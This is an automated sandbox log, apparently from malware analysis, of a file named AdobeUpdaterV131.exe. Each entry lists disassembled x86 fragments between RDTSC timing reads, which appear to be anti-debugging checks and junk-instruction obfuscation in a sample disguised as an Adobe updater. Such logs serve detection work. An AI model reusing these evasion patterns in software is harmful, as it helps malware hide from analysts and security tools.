Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 8D1636 second address: 8D1653 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F09D0D9C3E2h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 8D1653 second address: 8D1657 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 8D180C second address: 8D1818 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F09D0D9C3D6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 8D1818 second address: 8D181C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 8D181C second address: 8D1822 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 8D1822 second address: 8D182C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 8D182C second address: 8D1830 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 8D1830 second address: 8D1836 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 8D1948 second address: 8D1966 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F09D0D9C3E7h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 8D1966 second address: 8D1970 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 8D4B30 second address: 8D4B75 instructions: 0x00000000 rdtsc 0x00000002 js 00007F09D0D9C3E9h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e push edx 0x0000000f jmp 00007F09D0D9C3E6h 0x00000014 pop edx 0x00000015 mov eax, dword ptr [eax] 0x00000017 push ebx 0x00000018 pushad 0x00000019 jnc 00007F09D0D9C3D6h 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 8D4B75 second address: 8D4B95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F09D0731CB4h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 8D4B95 second address: 8D4BA5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F09D0D9C3DBh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 8D4C3D second address: 8D4C43 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 8D4E2F second address: 8D4E34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 8D4E34 second address: 8D4E78 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0731CAAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [esp], 711553B9h 0x00000010 push 00000000h 0x00000012 push esi 0x00000013 call 00007F09D0731CA8h 0x00000018 pop esi 0x00000019 mov dword ptr [esp+04h], esi 0x0000001d add dword ptr [esp+04h], 00000016h 0x00000025 inc esi 0x00000026 push esi 0x00000027 ret 0x00000028 pop esi 0x00000029 ret 0x0000002a lea ebx, dword ptr [ebp+1244899Dh] 0x00000030 sub dword ptr [ebp+122D19E0h], ecx 0x00000036 push eax 0x00000037 push edi 0x00000038 pushad 0x00000039 push eax 0x0000003a push edx 0x0000003b rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 8D4E78 second address: 8D4E7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 8F2B07 second address: 8F2B0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 8F2B0B second address: 8F2B1F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a jmp 00007F09D0D9C3DAh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 8F303B second address: 8F303F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 8F32F1 second address: 8F332B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0D9C3E1h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F09D0D9C3E5h 0x0000000e jmp 00007F09D0D9C3E0h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 8F349A second address: 8F34B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F09D0731CB8h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 8F34B9 second address: 8F34E2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0D9C3DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push edi 0x0000000f pop edi 0x00000010 jmp 00007F09D0D9C3E3h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 8F34E2 second address: 8F34F2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jbe 00007F09D0731CA6h 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f pop ecx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 8F3660 second address: 8F3664 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 8C86C3 second address: 8C86D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007F09D0731CB1h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 8C86D9 second address: 8C86FC instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F09D0D9C3EEh 0x00000008 jmp 00007F09D0D9C3E8h 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 8F43A0 second address: 8F43A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 8F43A6 second address: 8F43DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 pushad 0x00000007 jmp 00007F09D0D9C3E1h 0x0000000c push ebx 0x0000000d jmp 00007F09D0D9C3DDh 0x00000012 pop ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F09D0D9C3DFh 0x0000001a rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 8F9CAA second address: 8F9CBD instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F09D0731CA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 8F9CBD second address: 8F9CD0 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a popad 0x0000000b mov eax, dword ptr [eax] 0x0000000d pushad 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 8F9CD0 second address: 8F9CF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F09D0731CB0h 0x0000000a popad 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f jbe 00007F09D0731CB0h 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 8F84C7 second address: 8F84CC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 8F9DD3 second address: 8F9DEF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jl 00007F09D0731CA6h 0x0000000d pop edx 0x0000000e popad 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 jo 00007F09D0731CA6h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 8FC3DC second address: 8FC3ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 popad 0x00000008 js 00007F09D0D9C3FDh 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 8FC3ED second address: 8FC3F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 8FD958 second address: 8FD970 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0D9C3E4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 8FD970 second address: 8FD976 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 8FD976 second address: 8FD980 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F09D0D9C3D6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 8FD980 second address: 8FD984 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 8FD984 second address: 8FD98A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 8FD98A second address: 8FD9B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F09D0731CB3h 0x0000000f pushad 0x00000010 jno 00007F09D0731CA6h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 8FD9B0 second address: 8FD9BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jne 00007F09D0D9C3D6h 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 8FD9BD second address: 8FD9C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 9008C2 second address: 9008C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 9008C6 second address: 9008CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 9008CA second address: 9008D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 900FC8 second address: 900FF2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0731CB2h 0x00000007 jc 00007F09D0731CA6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 jno 00007F09D0731CA6h 0x00000019 pushad 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 900FF2 second address: 900FF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 900FF7 second address: 900FFC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 902BC2 second address: 902BC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 902BC6 second address: 902BCA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 903072 second address: 903076 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 903076 second address: 90307C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 90307C second address: 903082 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 903082 second address: 903086 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 90318D second address: 9031AF instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jnl 00007F09D0D9C3D6h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F09D0D9C3E3h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 90325E second address: 903262 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 903689 second address: 90368F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 90368F second address: 90369F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push esi 0x00000006 pop esi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 90369F second address: 9036A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 903765 second address: 90376A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 903885 second address: 903889 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 903D43 second address: 903D47 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 903D9C second address: 903DF7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jnc 00007F09D0D9C3F4h 0x0000000d nop 0x0000000e push 00000000h 0x00000010 push ebp 0x00000011 call 00007F09D0D9C3D8h 0x00000016 pop ebp 0x00000017 mov dword ptr [esp+04h], ebp 0x0000001b add dword ptr [esp+04h], 00000019h 0x00000023 inc ebp 0x00000024 push ebp 0x00000025 ret 0x00000026 pop ebp 0x00000027 ret 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007F09D0D9C3DAh 0x00000031 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 905DB7 second address: 905DBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 905505 second address: 90554C instructions: 0x00000000 rdtsc 0x00000002 jc 00007F09D0D9C3E6h 0x00000008 jmp 00007F09D0D9C3E0h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 jmp 00007F09D0D9C3E9h 0x00000018 jmp 00007F09D0D9C3DFh 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 90554C second address: 905552 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 905552 second address: 905556 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 9071BD second address: 9071C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 907F98 second address: 907FA9 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F09D0D9C3D8h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edi 0x0000000e push esi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 908A84 second address: 908A88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 908A88 second address: 908A8C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 90CE1F second address: 90CE24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 90F340 second address: 90F344 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 90F344 second address: 90F348 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 908817 second address: 908825 instructions: 0x00000000 rdtsc 0x00000002 js 00007F09D0D9C3D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 90F348 second address: 90F351 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 908825 second address: 90884C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0D9C3E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push edi 0x0000000f pop edi 0x00000010 push edx 0x00000011 pop edx 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 90884C second address: 908868 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F09D0731CB8h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 91032C second address: 910383 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push ebp 0x0000000a call 00007F09D0D9C3D8h 0x0000000f pop ebp 0x00000010 mov dword ptr [esp+04h], ebp 0x00000014 add dword ptr [esp+04h], 00000016h 0x0000001c inc ebp 0x0000001d push ebp 0x0000001e ret 0x0000001f pop ebp 0x00000020 ret 0x00000021 mov ebx, 57C824C3h 0x00000026 mov dword ptr [ebp+122D1D29h], eax 0x0000002c push 00000000h 0x0000002e push 00000000h 0x00000030 xchg eax, esi 0x00000031 jbe 00007F09D0D9C3E7h 0x00000037 jmp 00007F09D0D9C3E1h 0x0000003c push eax 0x0000003d push ecx 0x0000003e pushad 0x0000003f jo 00007F09D0D9C3D6h 0x00000045 push eax 0x00000046 push edx 0x00000047 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 9122C0 second address: 912339 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0731CB3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b pop eax 0x0000000c push eax 0x0000000d pop eax 0x0000000e popad 0x0000000f popad 0x00000010 nop 0x00000011 push 00000000h 0x00000013 push ecx 0x00000014 call 00007F09D0731CA8h 0x00000019 pop ecx 0x0000001a mov dword ptr [esp+04h], ecx 0x0000001e add dword ptr [esp+04h], 0000001Dh 0x00000026 inc ecx 0x00000027 push ecx 0x00000028 ret 0x00000029 pop ecx 0x0000002a ret 0x0000002b movzx ebx, cx 0x0000002e add ebx, 74AE3EE4h 0x00000034 push 00000000h 0x00000036 push ebx 0x00000037 sub edi, 4E45006Ah 0x0000003d pop edi 0x0000003e push 00000000h 0x00000040 mov dword ptr [ebp+1245A33Eh], edx 0x00000046 mov bl, 0Dh 0x00000048 xchg eax, esi 0x00000049 jmp 00007F09D0731CB2h 0x0000004e push eax 0x0000004f pushad 0x00000050 push edx 0x00000051 push eax 0x00000052 push edx 0x00000053 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 9131D4 second address: 9131D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 909D00 second address: 909D05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 90D624 second address: 90D62A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 90E577 second address: 90E57B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 91141C second address: 911423 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
